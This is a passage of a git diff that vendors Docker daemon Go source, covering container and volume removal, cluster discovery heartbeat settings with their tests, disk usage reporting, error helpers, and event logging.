+	}
+
+	if config.RemoveLink {
+		return daemon.rmLink(container, name)
+	}
+
+	err = daemon.cleanupContainer(container, config.ForceRemove, config.RemoveVolume)
+	containerActions.WithValues("delete").UpdateSince(start)
+
+	return err
+}
+
+func (daemon *Daemon) rmLink(container *container.Container, name string) error {
+	if name[0] != '/' {
+		name = "/" + name
+	}
+	parent, n := path.Split(name)
+	if parent == "/" {
+		return fmt.Errorf("Conflict, cannot remove the default name of the container")
+	}
+
+	parent = strings.TrimSuffix(parent, "/")
+	pe, err := daemon.nameIndex.Get(parent)
+	if err != nil {
+		return fmt.Errorf("Cannot get parent %s for name %s", parent, name)
+	}
+
+	daemon.releaseName(name)
+	parentContainer, _ := daemon.GetContainer(pe)
+	if parentContainer != nil {
+		daemon.linkIndex.unlink(name, container, parentContainer)
+		if err := daemon.updateNetwork(parentContainer); err != nil {
+			logrus.Debugf("Could not update network to remove link %s: %v", n, err)
+		}
+	}
+	return nil
+}
+
+// cleanupContainer unregisters a container from the daemon, stops stats
+// collection and cleanly removes contents and metadata from the filesystem.
+func (daemon *Daemon) cleanupContainer(container *container.Container, forceRemove, removeVolume bool) (err error) {
+	if container.IsRunning() {
+		if !forceRemove {
+			err := fmt.Errorf("You cannot remove a running container %s. Stop the container before attempting removal or use -f", container.ID)
+			return errors.NewRequestConflictError(err)
+		}
+		if err := daemon.Kill(container); err != nil {
+			return fmt.Errorf("Could not kill running container %s, cannot remove - %v", container.ID, err)
+		}
+	}
+
+	// stop collection of stats for the container regardless
+	// if stats are currently getting collected.
+	daemon.statsCollector.stopCollection(container)
+
+	if err = daemon.containerStop(container, 3); err != nil {
+		return err
+	}
+
+	// Mark container dead. We don't want anybody to be restarting it.
+	container.SetDead()
+
+	// Save container state to disk. So that if error happens before
+	// container meta file got removed from disk, then a restart of
+	// docker should not make a dead container alive.
+	if err := container.ToDiskLocking(); err != nil && !os.IsNotExist(err) {
+		logrus.Errorf("Error saving dying container to disk: %v", err)
+	}
+
+	// If force removal is required, delete container from various
+	// indexes even if removal failed.
+	defer func() {
+		if err == nil || forceRemove {
+			daemon.nameIndex.Delete(container.ID)
+			daemon.linkIndex.delete(container)
+			selinuxFreeLxcContexts(container.ProcessLabel)
+			daemon.idIndex.Delete(container.ID)
+			daemon.containers.Delete(container.ID)
+			if e := daemon.removeMountPoints(container, removeVolume); e != nil {
+				logrus.Error(e)
+			}
+			daemon.LogContainerEvent(container, "destroy")
+		}
+	}()
+
+	if err = os.RemoveAll(container.Root); err != nil {
+		return fmt.Errorf("Unable to remove filesystem for %v: %v", container.ID, err)
+	}
+
+	// When container creation fails and `RWLayer` has not been created yet, we
+	// do not call `ReleaseRWLayer`
+	if container.RWLayer != nil {
+		metadata, err := daemon.layerStore.ReleaseRWLayer(container.RWLayer)
+		layer.LogReleaseMetadata(metadata)
+		if err != nil && err != layer.ErrMountDoesNotExist {
+			return fmt.Errorf("Driver %s failed to remove root filesystem %s: %s", daemon.GraphDriverName(), container.ID, err)
+		}
+	}
+
+	return nil
+}
+
+// VolumeRm removes the volume with the given name.
+// If the volume is referenced by a container it is not removed
+// This is called directly from the Engine API
+func (daemon *Daemon) VolumeRm(name string, force bool) error {
+	err := daemon.volumeRm(name)
+	if err == nil || force {
+		daemon.volumes.Purge(name)
+		return nil
+	}
+	return err
+}
+
+func (daemon *Daemon) volumeRm(name string) error {
+	v, err := daemon.volumes.Get(name)
+	if err != nil {
+		return err
+	}
+
+	if err := daemon.volumes.Remove(v); err != nil {
+		if volumestore.IsInUse(err) {
+			err := fmt.Errorf("Unable to remove volume, volume still in use: %v", err)
+			return errors.NewRequestConflictError(err)
+		}
+		return fmt.Errorf("Error while removing volume %s: %v", name, err)
+	}
+	daemon.LogVolumeEvent(v.Name(), "destroy", map[string]string{"driver": v.DriverName()})
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/delete_test.go b/vendor/github.com/docker/docker/daemon/delete_test.go
new file mode 100644
index 0000000000..1fd27e1ffa
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/delete_test.go
@@ -0,0 +1,43 @@
+package daemon
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+)
+
+func TestContainerDoubleDelete(t *testing.T) {
+	tmp, err := ioutil.TempDir("", "docker-daemon-unix-test-")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmp)
+	daemon := &Daemon{
+		repository: tmp,
+		root:       tmp,
+	}
+	daemon.containers = container.NewMemoryStore()
+
+	container := &container.Container{
+		CommonContainer: container.CommonContainer{
+			ID:     "test",
+			State:  container.NewState(),
+			Config: &containertypes.Config{},
+		},
+	}
+	daemon.containers.Add(container.ID, container)
+
+	// Mark the container as having a delete in progress
+	container.SetRemovalInProgress()
+
+	// Try to remove the container when its state is removalInProgress.
+	// It should return an error indicating it is under removal progress.
+	if err := daemon.ContainerRm(container.ID, &types.ContainerRmConfig{ForceRemove: true}); err == nil {
+		t.Fatalf("expected err: %v, got nil", fmt.Sprintf("removal of container %s is already in progress", container.ID))
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/discovery.go b/vendor/github.com/docker/docker/daemon/discovery.go
new file mode 100644
index 0000000000..ee4ea875b7
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/discovery.go
@@ -0,0 +1,215 @@
+package daemon
+
+import (
+	"errors"
+	"fmt"
+	"reflect"
+	"strconv"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/discovery"
+
+	// Register the libkv backends for discovery.
+	_ "github.com/docker/docker/pkg/discovery/kv"
+)
+
+const (
+	// defaultDiscoveryHeartbeat is the default value for discovery heartbeat interval.
+	defaultDiscoveryHeartbeat = 20 * time.Second
+	// defaultDiscoveryTTLFactor is the default TTL factor for discovery
+	defaultDiscoveryTTLFactor = 3
+)
+
+var errDiscoveryDisabled = errors.New("discovery is disabled")
+
+type discoveryReloader interface {
+	discovery.Watcher
+	Stop()
+	Reload(backend, address string, clusterOpts map[string]string) error
+	ReadyCh() <-chan struct{}
+}
+
+type daemonDiscoveryReloader struct {
+	backend discovery.Backend
+	ticker  *time.Ticker
+	term    chan bool
+	readyCh chan struct{}
+}
+
+func (d *daemonDiscoveryReloader) Watch(stopCh <-chan struct{}) (<-chan discovery.Entries, <-chan error) {
+	return d.backend.Watch(stopCh)
+}
+
+func (d *daemonDiscoveryReloader) ReadyCh() <-chan struct{} {
+	return d.readyCh
+}
+
+func discoveryOpts(clusterOpts map[string]string) (time.Duration, time.Duration, error) {
+	var (
+		heartbeat = defaultDiscoveryHeartbeat
+		ttl       = defaultDiscoveryTTLFactor * defaultDiscoveryHeartbeat
+	)
+
+	if hb, ok := clusterOpts["discovery.heartbeat"]; ok {
+		h, err := strconv.Atoi(hb)
+		if err != nil {
+			return time.Duration(0), time.Duration(0), err
+		}
+
+		if h <= 0 {
+			return time.Duration(0), time.Duration(0),
+				fmt.Errorf("discovery.heartbeat must be positive")
+		}
+
+		heartbeat = time.Duration(h) * time.Second
+		ttl = defaultDiscoveryTTLFactor * heartbeat
+	}
+
+	if tstr, ok := clusterOpts["discovery.ttl"]; ok {
+		t, err := strconv.Atoi(tstr)
+		if err != nil {
+			return time.Duration(0), time.Duration(0), err
+		}
+
+		if t <= 0 {
+			return time.Duration(0), time.Duration(0),
+				fmt.Errorf("discovery.ttl must be positive")
+		}
+
+		ttl = time.Duration(t) * time.Second
+
+		if _, ok := clusterOpts["discovery.heartbeat"]; !ok {
+			h := int(t / defaultDiscoveryTTLFactor)
+			heartbeat = time.Duration(h) * time.Second
+		}
+
+		if ttl <= heartbeat {
+			return time.Duration(0), time.Duration(0),
+				fmt.Errorf("discovery.ttl timer must be greater than discovery.heartbeat")
+		}
+	}
+
+	return heartbeat, ttl, nil
+}
+
+// initDiscovery initializes the nodes discovery subsystem by connecting to the specified backend
+// and starts a registration loop to advertise the current node under the specified address.
+func initDiscovery(backendAddress, advertiseAddress string, clusterOpts map[string]string) (discoveryReloader, error) {
+	heartbeat, backend, err := parseDiscoveryOptions(backendAddress, clusterOpts)
+	if err != nil {
+		return nil, err
+	}
+
+	reloader := &daemonDiscoveryReloader{
+		backend: backend,
+		ticker:  time.NewTicker(heartbeat),
+		term:    make(chan bool),
+		readyCh: make(chan struct{}),
+	}
+	// We call Register() on the discovery backend in a loop for the whole lifetime of the daemon,
+	// but we never actually Watch() for nodes appearing and disappearing for the moment.
+	go reloader.advertiseHeartbeat(advertiseAddress)
+	return reloader, nil
+}
+
+// advertiseHeartbeat registers the current node against the discovery backend using the specified
+// address. The function never returns, as registration against the backend comes with a TTL and
+// requires regular heartbeats.
+func (d *daemonDiscoveryReloader) advertiseHeartbeat(address string) {
+	var ready bool
+	if err := d.initHeartbeat(address); err == nil {
+		ready = true
+		close(d.readyCh)
+	}
+
+	for {
+		select {
+		case <-d.ticker.C:
+			if err := d.backend.Register(address); err != nil {
+				logrus.Warnf("Registering as %q in discovery failed: %v", address, err)
+			} else {
+				if !ready {
+					close(d.readyCh)
+					ready = true
+				}
+			}
+		case <-d.term:
+			return
+		}
+	}
+}
+
+// initHeartbeat is used to do the first heartbeat. It uses a tight loop until
+// either the timeout period is reached or the heartbeat is successful and returns.
+func (d *daemonDiscoveryReloader) initHeartbeat(address string) error {
+	// Setup a short ticker until the first heartbeat has succeeded
+	t := time.NewTicker(500 * time.Millisecond)
+	defer t.Stop()
+	// timeout makes sure that after a period of time we stop being so aggressive trying to reach the discovery service
+	timeout := time.After(60 * time.Second)
+
+	for {
+		select {
+		case <-timeout:
+			return errors.New("timeout waiting for initial discovery")
+		case <-d.term:
+			return errors.New("terminated")
+		case <-t.C:
+			if err := d.backend.Register(address); err == nil {
+				return nil
+			}
+		}
+	}
+}
+
+// Reload makes the watcher to stop advertising and reconfigures it to advertise in a new address.
+func (d *daemonDiscoveryReloader) Reload(backendAddress, advertiseAddress string, clusterOpts map[string]string) error {
+	d.Stop()
+
+	heartbeat, backend, err := parseDiscoveryOptions(backendAddress, clusterOpts)
+	if err != nil {
+		return err
+	}
+
+	d.backend = backend
+	d.ticker = time.NewTicker(heartbeat)
+	d.readyCh = make(chan struct{})
+
+	go d.advertiseHeartbeat(advertiseAddress)
+	return nil
+}
+
+// Stop terminates the discovery advertising.
+func (d *daemonDiscoveryReloader) Stop() {
+	d.ticker.Stop()
+	d.term <- true
+}
+
+func parseDiscoveryOptions(backendAddress string, clusterOpts map[string]string) (time.Duration, discovery.Backend, error) {
+	heartbeat, ttl, err := discoveryOpts(clusterOpts)
+	if err != nil {
+		return 0, nil, err
+	}
+
+	backend, err := discovery.New(backendAddress, heartbeat, ttl, clusterOpts)
+	if err != nil {
+		return 0, nil, err
+	}
+	return heartbeat, backend, nil
+}
+
+// modifiedDiscoverySettings returns whether the discovery configuration has been modified or not.
+func modifiedDiscoverySettings(config *Config, backendType, advertise string, clusterOpts map[string]string) bool {
+	if config.ClusterStore != backendType || config.ClusterAdvertise != advertise {
+		return true
+	}
+
+	if (config.ClusterOpts == nil && clusterOpts == nil) ||
+		(config.ClusterOpts == nil && len(clusterOpts) == 0) ||
+		(len(config.ClusterOpts) == 0 && clusterOpts == nil) {
+		return false
+	}
+
+	return !reflect.DeepEqual(config.ClusterOpts, clusterOpts)
+}
diff --git a/vendor/github.com/docker/docker/daemon/discovery_test.go b/vendor/github.com/docker/docker/daemon/discovery_test.go
new file mode 100644
index 0000000000..336973c516
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/discovery_test.go
@@ -0,0 +1,164 @@
+package daemon
+
+import (
+	"testing"
+	"time"
+)
+
+func TestDiscoveryOpts(t *testing.T) {
+	clusterOpts := map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "5"}
+	heartbeat, ttl, err := discoveryOpts(clusterOpts)
+	if err == nil {
+		t.Fatalf("discovery.ttl < discovery.heartbeat must fail")
+	}
+
+	clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "10"}
+	heartbeat, ttl, err = discoveryOpts(clusterOpts)
+	if err == nil {
+		t.Fatalf("discovery.ttl == discovery.heartbeat must fail")
+	}
+
+	clusterOpts = map[string]string{"discovery.heartbeat": "-10", "discovery.ttl": "10"}
+	heartbeat, ttl, err = discoveryOpts(clusterOpts)
+	if err == nil {
+		t.Fatalf("negative discovery.heartbeat must fail")
+	}
+
+	clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "-10"}
+	heartbeat, ttl, err = discoveryOpts(clusterOpts)
+	if err == nil {
+		t.Fatalf("negative discovery.ttl must fail")
+	}
+
+	clusterOpts = map[string]string{"discovery.heartbeat": "invalid"}
+	heartbeat, ttl, err = discoveryOpts(clusterOpts)
+	if err == nil {
+		t.Fatalf("invalid discovery.heartbeat must fail")
+	}
+
+	clusterOpts = map[string]string{"discovery.ttl": "invalid"}
+	heartbeat, ttl, err = discoveryOpts(clusterOpts)
+	if err == nil {
+		t.Fatalf("invalid discovery.ttl must fail")
+	}
+
+	clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "20"}
+	heartbeat, ttl, err = discoveryOpts(clusterOpts)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if heartbeat != 10*time.Second {
+		t.Fatalf("Heartbeat - Expected : %v, Actual : %v", 10*time.Second, heartbeat)
+	}
+
+	if ttl != 20*time.Second {
+		t.Fatalf("TTL - Expected : %v, Actual : %v", 20*time.Second, ttl)
+	}
+
+	clusterOpts = map[string]string{"discovery.heartbeat": "10"}
+	heartbeat, ttl, err = discoveryOpts(clusterOpts)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if heartbeat != 10*time.Second {
+		t.Fatalf("Heartbeat - Expected : %v, Actual : %v", 10*time.Second, heartbeat)
+	}
+
+	expected := 10 * defaultDiscoveryTTLFactor * time.Second
+	if ttl != expected {
+		t.Fatalf("TTL - Expected : %v, Actual : %v", expected, ttl)
+	}
+
+	clusterOpts = map[string]string{"discovery.ttl": "30"}
+	heartbeat, ttl, err = discoveryOpts(clusterOpts)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if ttl != 30*time.Second {
+		t.Fatalf("TTL - Expected : %v, Actual : %v", 30*time.Second, ttl)
+	}
+
+	expected = 30 * time.Second / defaultDiscoveryTTLFactor
+	if heartbeat != expected {
+		t.Fatalf("Heartbeat - Expected : %v, Actual : %v", expected, heartbeat)
+	}
+
+	clusterOpts = map[string]string{}
+	heartbeat, ttl, err = discoveryOpts(clusterOpts)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if heartbeat != defaultDiscoveryHeartbeat {
+		t.Fatalf("Heartbeat - Expected : %v, Actual : %v", defaultDiscoveryHeartbeat, heartbeat)
+	}
+
+	expected = defaultDiscoveryHeartbeat * defaultDiscoveryTTLFactor
+	if ttl != expected {
+		t.Fatalf("TTL - Expected : %v, Actual : %v", expected, ttl)
+	}
+}
+
+func TestModifiedDiscoverySettings(t *testing.T) {
+	cases := []struct {
+		current  *Config
+		modified *Config
+		expected bool
+	}{
+		{
+			current:  discoveryConfig("foo", "bar", map[string]string{}),
+			modified: discoveryConfig("foo", "bar", map[string]string{}),
+			expected: false,
+		},
+		{
+			current:  discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}),
+			modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}),
+			expected: false,
+		},
+		{
+			current:  discoveryConfig("foo", "bar", map[string]string{}),
+			modified: discoveryConfig("foo", "bar", nil),
+			expected: false,
+		},
+		{
+			current:  discoveryConfig("foo", "bar", nil),
+			modified: discoveryConfig("foo", "bar", map[string]string{}),
+			expected: false,
+		},
+		{
+			current:  discoveryConfig("foo", "bar", nil),
+			modified: discoveryConfig("baz", "bar", nil),
+			expected: true,
+		},
+		{
+			current:  discoveryConfig("foo", "bar", nil),
+			modified: discoveryConfig("foo", "baz", nil),
+			expected: true,
+		},
+		{
+			current:  discoveryConfig("foo", "bar", nil),
+			modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}),
+			expected: true,
+		},
+	}
+
+	for _, c := range cases {
+		got := modifiedDiscoverySettings(c.current, c.modified.ClusterStore, c.modified.ClusterAdvertise, c.modified.ClusterOpts)
+		if c.expected != got {
+			t.Fatalf("expected %v, got %v: current config %v, new config %v", c.expected, got, c.current, c.modified)
+		}
+	}
+}
+
+func discoveryConfig(backendAddr, advertiseAddr string, opts map[string]string) *Config {
+	return &Config{
+		CommonConfig: CommonConfig{
+			ClusterStore:     backendAddr,
+			ClusterAdvertise: advertiseAddr,
+			ClusterOpts:      opts,
+		},
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/disk_usage.go b/vendor/github.com/docker/docker/daemon/disk_usage.go
new file mode 100644
index 0000000000..c3b918660d
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/disk_usage.go
@@ -0,0 +1,100 @@
+package daemon
+
+import (
+	"fmt"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/directory"
+	"github.com/docker/docker/volume"
+)
+
+func (daemon *Daemon) getLayerRefs() map[layer.ChainID]int {
+	tmpImages := daemon.imageStore.Map()
+	layerRefs := map[layer.ChainID]int{}
+	for id, img := range tmpImages {
+		dgst := digest.Digest(id)
+		if len(daemon.referenceStore.References(dgst)) == 0 && len(daemon.imageStore.Children(id)) != 0 {
+			continue
+		}
+
+		rootFS := *img.RootFS
+		rootFS.DiffIDs = nil
+		for _, id := range img.RootFS.DiffIDs {
+			rootFS.Append(id)
+			chid := rootFS.ChainID()
+			layerRefs[chid]++
+		}
+	}
+
+	return layerRefs
+}
+
+// SystemDiskUsage returns information about the daemon data disk usage
+func (daemon *Daemon) SystemDiskUsage() (*types.DiskUsage, error) {
+	// Retrieve container list
+	allContainers, err := daemon.Containers(&types.ContainerListOptions{
+		Size: true,
+		All:  true,
+	})
+	if err != nil {
+		return nil, fmt.Errorf("failed to retrieve container list: %v", err)
+	}
+
+	// Get all top images with extra attributes
+	allImages, err := daemon.Images(filters.NewArgs(), false, true)
+	if err != nil {
+		return nil, fmt.Errorf("failed to retrieve image list: %v", err)
+	}
+
+	// Get all local volumes
+	allVolumes := []*types.Volume{}
+	getLocalVols := func(v volume.Volume) error {
+		name := v.Name()
+		refs := daemon.volumes.Refs(v)
+
+		tv := volumeToAPIType(v)
+		sz, err := directory.Size(v.Path())
+		if err != nil {
+			logrus.Warnf("failed to determine size of volume %v", name)
+			sz = -1
+		}
+		tv.UsageData = &types.VolumeUsageData{Size: sz, RefCount: int64(len(refs))}
+		allVolumes = append(allVolumes, tv)
+
+		return nil
+	}
+
+	err = daemon.traverseLocalVolumes(getLocalVols)
+	if err != nil {
+		return nil, err
+	}
+
+	// Get total layers size on disk
+	layerRefs := daemon.getLayerRefs()
+	allLayers := daemon.layerStore.Map()
+	var allLayersSize int64
+	for _, l := range allLayers {
+		size, err := l.DiffSize()
+		if err == nil {
+			if _, ok := layerRefs[l.ChainID()]; ok {
+				allLayersSize += size
+			} else {
+				logrus.Warnf("found leaked image layer %v", l.ChainID())
+			}
+		} else {
+			logrus.Warnf("failed to get diff size for layer %v", l.ChainID())
+		}
+
+	}
+
+	return &types.DiskUsage{
+		LayersSize: allLayersSize,
+		Containers: allContainers,
+		Volumes:    allVolumes,
+		Images:     allImages,
+	}, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/errors.go b/vendor/github.com/docker/docker/daemon/errors.go
new file mode 100644
index 0000000000..566a32f175
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/errors.go
@@ -0,0 +1,57 @@
+package daemon
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/api/errors"
+	"github.com/docker/docker/reference"
+)
+
+func (d *Daemon) imageNotExistToErrcode(err error) error {
+	if dne, isDNE := err.(ErrImageDoesNotExist); isDNE {
+		if strings.Contains(dne.RefOrID, "@") {
+			e := fmt.Errorf("No such image: %s", dne.RefOrID)
+			return errors.NewRequestNotFoundError(e)
+		}
+		tag := reference.DefaultTag
+		ref, err := reference.ParseNamed(dne.RefOrID)
+		if err != nil {
+			e := fmt.Errorf("No such image: %s:%s", dne.RefOrID, tag)
+			return errors.NewRequestNotFoundError(e)
+		}
+		if tagged, isTagged := ref.(reference.NamedTagged); isTagged {
+			tag = tagged.Tag()
+		}
+		e := fmt.Errorf("No such image: %s:%s", ref.Name(), tag)
+		return errors.NewRequestNotFoundError(e)
+	}
+	return err
+}
+
+type errNotRunning struct {
+	containerID string
+}
+
+func (e errNotRunning) Error() string {
+	return fmt.Sprintf("Container %s is not running", e.containerID)
+}
+
+func (e errNotRunning) ContainerIsRunning() bool {
+	return false
+}
+
+func errContainerIsRestarting(containerID string) error {
+	err := fmt.Errorf("Container %s is restarting, wait until the container is running", containerID)
+	return errors.NewRequestConflictError(err)
+}
+
+func errExecNotFound(id string) error {
+	err := fmt.Errorf("No such exec instance '%s' found in daemon", id)
+	return errors.NewRequestNotFoundError(err)
+}
+
+func errExecPaused(id string) error {
+	err := fmt.Errorf("Container %s is paused, unpause the container before exec", id)
+	return errors.NewRequestConflictError(err)
+}
diff --git a/vendor/github.com/docker/docker/daemon/events.go b/vendor/github.com/docker/docker/daemon/events.go
new file mode 100644
index 0000000000..8fe8e1b640
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/events.go
@@ -0,0 +1,132 @@
+package daemon
+
+import (
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/container"
+	daemonevents "github.com/docker/docker/daemon/events"
+	"github.com/docker/libnetwork"
+)
+
+// LogContainerEvent generates an event related to a container with only the default attributes.
+func (daemon *Daemon) LogContainerEvent(container *container.Container, action string) {
+	daemon.LogContainerEventWithAttributes(container, action, map[string]string{})
+}
+
+// LogContainerEventWithAttributes generates an event related to a container with specific given attributes.
+func (daemon *Daemon) LogContainerEventWithAttributes(container *container.Container, action string, attributes map[string]string) {
+	copyAttributes(attributes, container.Config.Labels)
+	if container.Config.Image != "" {
+		attributes["image"] = container.Config.Image
+	}
+	attributes["name"] = strings.TrimLeft(container.Name, "/")
+
+	actor := events.Actor{
+		ID:         container.ID,
+		Attributes: attributes,
+	}
+	daemon.EventsService.Log(action, events.ContainerEventType, actor)
+}
+
+// LogImageEvent generates an event related to an image with only the default attributes.
+func (daemon *Daemon) LogImageEvent(imageID, refName, action string) {
+	daemon.LogImageEventWithAttributes(imageID, refName, action, map[string]string{})
+}
+
+// LogImageEventWithAttributes generates an event related to an image with specific given attributes.
+func (daemon *Daemon) LogImageEventWithAttributes(imageID, refName, action string, attributes map[string]string) {
+	img, err := daemon.GetImage(imageID)
+	if err == nil && img.Config != nil {
+		// image has not been removed yet.
+		// it could be missing if the event is `delete`.
+		copyAttributes(attributes, img.Config.Labels)
+	}
+	if refName != "" {
+		attributes["name"] = refName
+	}
+	actor := events.Actor{
+		ID:         imageID,
+		Attributes: attributes,
+	}
+
+	daemon.EventsService.Log(action, events.ImageEventType, actor)
+}
+
+// LogPluginEvent generates an event related to a plugin with only the default attributes.
+func (daemon *Daemon) LogPluginEvent(pluginID, refName, action string) {
+	daemon.LogPluginEventWithAttributes(pluginID, refName, action, map[string]string{})
+}
+
+// LogPluginEventWithAttributes generates an event related to a plugin with specific given attributes.
+func (daemon *Daemon) LogPluginEventWithAttributes(pluginID, refName, action string, attributes map[string]string) {
+	attributes["name"] = refName
+	actor := events.Actor{
+		ID:         pluginID,
+		Attributes: attributes,
+	}
+	daemon.EventsService.Log(action, events.PluginEventType, actor)
+}
+
+// LogVolumeEvent generates an event related to a volume.
+func (daemon *Daemon) LogVolumeEvent(volumeID, action string, attributes map[string]string) {
+	actor := events.Actor{
+		ID:         volumeID,
+		Attributes: attributes,
+	}
+	daemon.EventsService.Log(action, events.VolumeEventType, actor)
+}
+
+// LogNetworkEvent generates an event related to a network with only the default attributes.
+func (daemon *Daemon) LogNetworkEvent(nw libnetwork.Network, action string) {
+	daemon.LogNetworkEventWithAttributes(nw, action, map[string]string{})
+}
+
+// LogNetworkEventWithAttributes generates an event related to a network with specific given attributes.
+func (daemon *Daemon) LogNetworkEventWithAttributes(nw libnetwork.Network, action string, attributes map[string]string) {
+	attributes["name"] = nw.Name()
+	attributes["type"] = nw.Type()
+	actor := events.Actor{
+		ID:         nw.ID(),
+		Attributes: attributes,
+	}
+	daemon.EventsService.Log(action, events.NetworkEventType, actor)
+}
+
+// LogDaemonEventWithAttributes generates an event related to the daemon itself with specific given attributes.
+func (daemon *Daemon) LogDaemonEventWithAttributes(action string, attributes map[string]string) {
+	if daemon.EventsService != nil {
+		if info, err := daemon.SystemInfo(); err == nil && info.Name != "" {
+			attributes["name"] = info.Name
+		}
+		actor := events.Actor{
+			ID:         daemon.ID,
+			Attributes: attributes,
+		}
+		daemon.EventsService.Log(action, events.DaemonEventType, actor)
+	}
+}
+
+// SubscribeToEvents returns the currently record of events, a channel to stream new events from, and a function to cancel the stream of events.
+func (daemon *Daemon) SubscribeToEvents(since, until time.Time, filter filters.Args) ([]events.Message, chan interface{}) {
+	ef := daemonevents.NewFilter(filter)
+	return daemon.EventsService.SubscribeTopic(since, until, ef)
+}
+
+// UnsubscribeFromEvents stops the event subscription for a client by closing the
+// channel where the daemon sends events to.
+func (daemon *Daemon) UnsubscribeFromEvents(listener chan interface{}) {
+	daemon.EventsService.Evict(listener)
+}
+
+// copyAttributes guarantees that labels are not mutated by event triggers.
+func copyAttributes(attributes, labels map[string]string) {
+	if labels == nil {
+		return
+	}
+	for k, v := range labels {
+		attributes[k] = v
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/events/events.go b/vendor/github.com/docker/docker/daemon/events/events.go
new file mode 100644
index 0000000000..0bf105f54d
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/events/events.go
@@ -0,0 +1,158 @@
+package events
+
+import (
+	"sync"
+	"time"
+
+	eventtypes "github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/pkg/pubsub"
+)
+
+const (
+	eventsLimit = 64
+	bufferSize  = 1024
+)
+
+// Events is pubsub channel for events generated by the engine.
+type Events struct {
+	mu     sync.Mutex
+	events []eventtypes.Message
+	pub    *pubsub.Publisher
+}
+
+// New returns new *Events instance
+func New() *Events {
+	return &Events{
+		events: make([]eventtypes.Message, 0, eventsLimit),
+		pub:    pubsub.NewPublisher(100*time.Millisecond, bufferSize),
+	}
+}
+
+// Subscribe adds new listener to events, returns slice of 64 stored
+// last events, a channel in which you can expect new events (in form
+// of interface{}, so you need type assertion), and a function to call
+// to stop the stream of events.
+func (e *Events) Subscribe() ([]eventtypes.Message, chan interface{}, func()) {
+	eventSubscribers.Inc()
+	e.mu.Lock()
+	current := make([]eventtypes.Message, len(e.events))
+	copy(current, e.events)
+	l := e.pub.Subscribe()
+	e.mu.Unlock()
+
+	cancel := func() {
+		e.Evict(l)
+	}
+	return current, l, cancel
+}
+
+// SubscribeTopic adds new listener to events, returns slice of 64 stored
+// last events, a channel in which you can expect new events (in form
+// of interface{}, so you need type assertion).
+func (e *Events) SubscribeTopic(since, until time.Time, ef *Filter) ([]eventtypes.Message, chan interface{}) {
+	eventSubscribers.Inc()
+	e.mu.Lock()
+
+	var topic func(m interface{}) bool
+	if ef != nil && ef.filter.Len() > 0 {
+		topic = func(m interface{}) bool { return ef.Include(m.(eventtypes.Message)) }
+	}
+
+	buffered := e.loadBufferedEvents(since, until, topic)
+
+	var ch chan interface{}
+	if topic != nil {
+		ch = e.pub.SubscribeTopic(topic)
+	} else {
+		// Subscribe to all events if there are no filters
+		ch = e.pub.Subscribe()
+	}
+
+	e.mu.Unlock()
+	return buffered, ch
+}
+
+// Evict evicts listener from pubsub
+func (e *Events) Evict(l chan interface{}) {
+	eventSubscribers.Dec()
+	e.pub.Evict(l)
+}
+
+// Log broadcasts event to listeners. Each listener has 100 millisecond for
+// receiving event or it will be skipped.
+func (e *Events) Log(action, eventType string, actor eventtypes.Actor) {
+	eventsCounter.Inc()
+	now := time.Now().UTC()
+	jm := eventtypes.Message{
+		Action:   action,
+		Type:     eventType,
+		Actor:    actor,
+		Time:     now.Unix(),
+		TimeNano: now.UnixNano(),
+	}
+
+	// fill deprecated fields for container and images
+	switch eventType {
+	case eventtypes.ContainerEventType:
+		jm.ID = actor.ID
+		jm.Status = action
+		jm.From = actor.Attributes["image"]
+	case eventtypes.ImageEventType:
+		jm.ID = actor.ID
+		jm.Status = action
+	}
+
+	e.mu.Lock()
+	if len(e.events) == cap(e.events) {
+		// discard oldest event
+		copy(e.events, e.events[1:])
+		e.events[len(e.events)-1] = jm
+	} else {
+		e.events = append(e.events, jm)
+	}
+	e.mu.Unlock()
+	e.pub.Publish(jm)
+}
+
+// SubscribersCount returns number of event listeners
+func (e *Events) SubscribersCount() int {
+	return e.pub.Len()
+}
+
+// loadBufferedEvents iterates over the cached events in the buffer
+// and returns those that were emitted between two specific dates.
+// It uses `time.Unix(seconds, nanoseconds)` to generate valid dates with those arguments.
+// It filters those buffered messages with a topic function if it's not nil, otherwise it adds all messages.
+func (e *Events) loadBufferedEvents(since, until time.Time, topic func(interface{}) bool) []eventtypes.Message {
+	var buffered []eventtypes.Message
+	if since.IsZero() && until.IsZero() {
+		return buffered
+	}
+
+	var sinceNanoUnix int64
+	if !since.IsZero() {
+		sinceNanoUnix = since.UnixNano()
+	}
+
+	var untilNanoUnix int64
+	if !until.IsZero() {
+		untilNanoUnix = until.UnixNano()
+	}
